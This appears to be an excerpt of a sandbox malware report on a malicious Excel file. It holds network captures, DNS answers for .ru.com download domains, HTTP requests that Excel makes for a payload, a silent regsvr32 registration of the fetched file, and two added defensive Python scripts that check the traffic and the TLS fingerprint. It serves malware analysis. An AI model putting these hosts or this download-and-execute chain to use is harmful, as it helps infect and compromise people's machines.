                                                                                                                                                                      Apr 9, 2021 16:32:51.568118095 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.568130970 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.568135977 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.568152905 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.568181992 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.568239927 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.568295002 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.577044964 CEST49708443192.168.2.5162.251.80.27
                                                                                                                                                                      Apr 9, 2021 16:32:51.724872112 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:51.726483107 CEST44349708162.251.80.27192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.887449026 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:51.887571096 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:51.888139963 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.048655987 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054092884 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054116964 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054127932 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.054191113 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.054413080 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.068753004 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.229655981 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.229747057 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.230861902 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.435995102 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.817079067 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.817186117 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.817459106 CEST4434970967.222.38.97192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:52.817528009 CEST49709443192.168.2.567.222.38.97
                                                                                                                                                                      Apr 9, 2021 16:32:52.847177029 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.020139933 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.021712065 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.022327900 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.194963932 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195327997 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195377111 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195414066 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195450068 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.195480108 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.195554972 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.195559978 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.197325945 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.201728106 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.234844923 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.407876015 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.408828974 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.409564972 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.625683069 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.689618111 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.689646006 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:32:53.689744949 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.690171957 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                      Apr 9, 2021 16:32:53.862592936 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:22.817353964 CEST4434970967.222.38.97192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 9, 2021 16:32:33.274650097 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:33.288738012 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:33.471756935 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:33.484988928 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:34.134174109 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:34.148879051 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:35.371589899 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:35.385628939 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:36.164657116 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:36.182590008 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:36.822885036 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:36.835565090 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:37.795372963 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:37.808442116 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:38.639306068 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:38.652040005 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:44.875857115 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:44.893810987 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:45.739701033 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:45.752399921 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:45.848380089 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:45.895380020 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:46.233835936 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:46.266985893 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:47.235687017 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:47.249058962 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:48.235239029 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:48.269509077 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:49.100858927 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:49.116050959 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:49.320487022 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:49.617819071 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:50.028651953 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:50.035092115 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:50.041322947 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:50.048213959 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:50.248240948 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:50.262741089 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:50.468092918 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:50.628273964 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:51.603812933 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:51.722814083 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:52.824796915 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:52.844868898 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:32:54.264189959 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:32:54.278040886 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:33:04.091212988 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:33:04.278136969 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:33:05.660773993 CEST | 59736 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:33:05.660993099 CEST | 51058 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:33:05.661112070 CEST | 52636 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:33:05.673764944 CEST | 53 | 51058 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:33:05.673964024 CEST | 53 | 52636 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:33:05.673985004 CEST | 53 | 59736 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:33:06.644540071 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:33:06.658512115 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:33:06.809588909 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Apr 9, 2021 16:33:06.828172922 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Apr 9, 2021 16:33:07.964963913 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:07.995057106 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:09.542166948 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:09.554812908 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:17.899082899 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:17.918118954 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:27.776884079 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:27.789747953 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:46.730371952 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:46.743416071 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:33:58.165067911 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:33:58.186606884 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:34:07.641311884 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:34:07.654872894 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                                      Apr 9, 2021 16:34:16.440901041 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                                      Apr 9, 2021 16:34:16.468780994 CEST53544508.8.8.8192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 9, 2021 16:32:49.320487022 CEST | 192.168.2.5 | 8.8.8.8 | 0x19d7 | Standard query (0) | runolfsson-jayde07s.ru.com | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:50.035092115 CEST | 192.168.2.5 | 8.8.8.8 | 0x62ad | Standard query (0) | cremin-ian07u.ru.com | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:50.468092918 CEST | 192.168.2.5 | 8.8.8.8 | 0x4440 | Standard query (0) | shalombaptistchapel.com | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:51.603812933 CEST | 192.168.2.5 | 8.8.8.8 | 0xfd97 | Standard query (0) | cesiroinsurance.com | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:52.824796915 CEST | 192.168.2.5 | 8.8.8.8 | 0xa4e4 | Standard query (0) | innermetransformation.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 9, 2021 16:32:49.617819071 CEST | 8.8.8.8 | 192.168.2.5 | 0x19d7 | No error (0) | runolfsson-jayde07s.ru.com | | 8.211.4.209 | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:50.048213959 CEST | 8.8.8.8 | 192.168.2.5 | 0x62ad | No error (0) | cremin-ian07u.ru.com | | 8.211.4.209 | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:50.628273964 CEST | 8.8.8.8 | 192.168.2.5 | 0x4440 | No error (0) | shalombaptistchapel.com | | 162.251.80.27 | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:51.722814083 CEST | 8.8.8.8 | 192.168.2.5 | 0xfd97 | No error (0) | cesiroinsurance.com | | 67.222.38.97 | A (IP address) | IN (0x0001)
Apr 9, 2021 16:32:52.844868898 CEST | 8.8.8.8 | 192.168.2.5 | 0xa4e4 | No error (0) | innermetransformation.com | | 173.201.252.173 | A (IP address) | IN (0x0001)
Apr 9, 2021 16:33:06.828172922 CEST | 8.8.8.8 | 192.168.2.5 | 0x7ad2 | No error (0) | api.globalsign.cloud | | 104.18.25.243 | A (IP address) | IN (0x0001)
Apr 9, 2021 16:33:06.828172922 CEST | 8.8.8.8 | 192.168.2.5 | 0x7ad2 | No error (0) | api.globalsign.cloud | | 104.18.24.243 | A (IP address) | IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • runolfsson-jayde07s.ru.com
                                                                                                                                                                      • cremin-ian07u.ru.com

                                                                                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49705 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Apr 9, 2021 16:32:49.638366938 CEST | 1231 | OUT | GET /ind.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: runolfsson-jayde07s.ru.com
Connection: Keep-Alive
Apr 9, 2021 16:32:50.025616884 CEST | 1236 | IN | HTTP/1.1 503 Service Unavailable
Date: Fri, 09 Apr 2021 14:32:49 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 76
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49707 | 8.211.4.209 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Apr 9, 2021 16:32:50.068398952 CEST | 1238 | OUT | GET /ind.html HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: cremin-ian07u.ru.com
Connection: Keep-Alive
Apr 9, 2021 16:32:50.458079100 CEST | 1243 | IN | HTTP/1.1 503 Service Unavailable
Date: Fri, 09 Apr 2021 14:32:50 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 76
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.
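The two HTTP sessions above, replayed offline as an added example that is not part of the Joe Sandbox report. The request and response text, the body hex and the process path are transcribed from the table; the list of browser process names and the wording of the findings are my own assumptions. The script decodes the hex body, checks it against Content-Length, flags a browser User-Agent coming from a non-browser process (the report's own signature "Uses a known web browser user agent for HTTP communication"), notes that a 503 status line carries a body worded like a 404 page, and groups the Host headers sent to one destination IP.

```python
from collections import defaultdict

# Values transcribed from the HTTP Packets table (constructed sample input).
UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
      ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")
BODY_HEX = ("3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 "
            "75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e "
            "6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e")
EXCEL = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"


def request(host):
    return ("GET /ind.html HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
            f"User-Agent: {UA}\r\nHost: {host}\r\nConnection: Keep-Alive\r\n\r\n")


def response(date):
    return ("HTTP/1.1 503 Service Unavailable\r\n"
            f"Date: {date}\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\n"
            "X-Powered-By: PHP/5.4.16\r\nContent-Length: 76\r\nConnection: close\r\n"
            "Content-Type: text/html; charset=UTF-8\r\n\r\n")


SESSIONS = [
    {"id": 0, "process": EXCEL, "dst": "8.211.4.209",
     "request": request("runolfsson-jayde07s.ru.com"),
     "response": response("Fri, 09 Apr 2021 14:32:49 GMT"), "body_hex": BODY_HEX},
    {"id": 1, "process": EXCEL, "dst": "8.211.4.209",
     "request": request("cremin-ian07u.ru.com"),
     "response": response("Fri, 09 Apr 2021 14:32:50 GMT"), "body_hex": BODY_HEX},
]

# Assumption: processes for which a browser User-Agent is expected.
BROWSER_PROCESSES = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}


def parse_message(raw):
    """Return (start line, {lower-case header name: value}) for an HTTP head."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers


def analyze_session(s):
    """Decode one session and collect the findings listed in the lead-in."""
    req_line, req = parse_message(s["request"])
    status_line, resp = parse_message(s["response"])
    body = bytes.fromhex(s["body_hex"])          # "Data Raw" column, hex to bytes
    status = int(status_line.split()[1])
    proc = s["process"].rsplit("\\", 1)[-1].lower()
    findings = []
    if proc not in BROWSER_PROCESSES and req.get("user-agent", "").startswith("Mozilla/"):
        findings.append(f"browser user agent sent by non-browser process {proc}")
    declared = int(resp.get("content-length", -1))
    if declared != len(body):
        findings.append(f"content-length {declared} != body {len(body)}")
    if status == 503 and b"not found" in body.lower():
        findings.append("503 status line but body reads like a 404 page")
    return {"id": s["id"], "host": req.get("host"), "path": req_line.split()[1],
            "status": status, "body": body.decode("utf-8", "replace"),
            "findings": findings}


def analyze(sessions):
    """Per-session findings plus a cross-session count of Host headers per server IP."""
    results = [analyze_session(s) for s in sessions]
    hosts_per_ip = defaultdict(set)
    for s, r in zip(sessions, results):
        hosts_per_ip[s["dst"]].add(r["host"])
    for s, r in zip(sessions, results):
        n = len(hosts_per_ip[s["dst"]])
        if n > 1:
            r["findings"].append(f"{n} distinct Host headers sent to {s['dst']}")
    return results


if __name__ == "__main__":
    for r in analyze(SESSIONS):
        print(r["id"], r["host"], r["status"], r["findings"])
```

The Content-Length check passes here (76 bytes declared, 76 decoded), so the transcript is complete; the interesting results are the other three findings, which are the same for both sessions.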


                                                                                                                                                                      HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Apr 9, 2021 16:32:50.934982061 CEST | 162.251.80.27 | 443 | 192.168.2.5 | 49708 | CN=autodiscover.shalombaptistchapel.com | CN=R3, O=Let's Encrypt, C=US | Sat Feb 13 12:43:03 CET 2021 | Fri May 14 13:43:03 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
  chain: CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Apr 9, 2021 16:32:52.054127932 CEST | 67.222.38.97 | 443 | 192.168.2.5 | 49709 | CN=www.cesiroinsurance.com | CN=R3, O=Let's Encrypt, C=US | Mon Feb 15 21:11:45 CET 2021 | Sun May 16 22:11:45 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
  chain: CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
Apr 9, 2021 16:32:53.197325945 CEST | 173.201.252.173 | 443 | 192.168.2.5 | 49710 | CN=innermetransformation.com | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | Tue Mar 02 01:00:00 CET 2021 | Tue Jun 01 01:59:59 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
  chain: CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025
  chain: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029
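The JA3 columns above pair a raw fingerprint string with its digest, and the same pair appears for all three TLS sessions. As an added example that is not part of the Joe Sandbox report, this Python decodes the string into named fields and recomputes the digest (JA3 defines the digest as MD5 over the raw string), so the ClientHello shape can be compared with other captures and the digest column verified. The extension and group names are a hand-picked subset of the IANA TLS registries; the static-RSA suite list is my own grouping of the suites present in the string.

```python
import hashlib

# Values copied from the HTTPS Packets table of this report.
REPORT_JA3 = ("771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-"
              "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")
REPORT_DIGEST = "37f463bf4616ecd445d4a1937da06e19"

# Subsets of the IANA TLS registries, enough to name every value in REPORT_JA3.
EXT_NAMES = {0: "server_name", 10: "supported_groups", 11: "ec_point_formats",
             13: "signature_algorithms", 23: "extended_master_secret",
             35: "session_ticket", 65281: "renegotiation_info"}
GROUP_NAMES = {23: "secp256r1", 24: "secp384r1", 29: "x25519"}
# Suites offered here that use static RSA key exchange (no forward secrecy);
# 10 (0x000a) is additionally 3DES.
STATIC_RSA_KX = {157, 156, 61, 60, 53, 47, 10}


def parse_ja3(ja3):
    """Split a JA3 string into version, ciphers, extensions, groups, point formats."""
    fields = ja3.split(",")
    if len(fields) != 5:
        raise ValueError("JA3 string needs exactly five comma-separated fields")
    ints = lambda f: [int(v) for v in f.split("-")] if f else []
    return {"version": int(fields[0]), "ciphers": ints(fields[1]),
            "extensions": ints(fields[2]), "groups": ints(fields[3]),
            "point_formats": ints(fields[4])}


def ja3_digest(ja3):
    """The JA3 digest is defined as MD5 over the raw fingerprint string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def describe(ja3):
    """Human-readable summary of a JA3 string plus its recomputed digest."""
    f = parse_ja3(ja3)
    return {
        "tls_version": "0x%04x" % f["version"],   # 771 -> 0x0303, i.e. TLS 1.2
        "cipher_count": len(f["ciphers"]),
        "static_rsa_suites": [c for c in f["ciphers"] if c in STATIC_RSA_KX],
        "extensions": [EXT_NAMES.get(e, str(e)) for e in f["extensions"]],
        "groups": [GROUP_NAMES.get(g, str(g)) for g in f["groups"]],
        "digest": ja3_digest(ja3),
    }


def digest_matches_report(ja3=REPORT_JA3, digest=REPORT_DIGEST):
    """True when the digest column is reproducible from the fingerprint column."""
    return ja3_digest(ja3) == digest.lower()


if __name__ == "__main__":
    import json
    print(json.dumps(describe(REPORT_JA3), indent=2))
    print("digest column reproduces from fingerprint:", digest_matches_report())
```

A JA3 string already has GREASE values stripped, so the absence of GREASE here says nothing by itself; the useful comparison is the whole string against a known-good capture from the same Windows build, which is what `describe()` makes readable.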

                                                                                                                                                                      Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

                                                                                                                                                                      System Behavior

General

Start time: 16:32:44
Start date: 09/04/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x290000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 16:32:53
Start date: 09/04/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 -s ..\ghnrope
Imagebase: 0x12f0000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 16:32:53
Start date: 09/04/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 -s
Imagebase: 0x12f0000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 16:32:53
Start date: 09/04/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32 -s
Imagebase: 0x12f0000
File size: 20992 bytes
                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:32:54
                                                                                                                                                                      Start date:09/04/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:regsvr32 -s
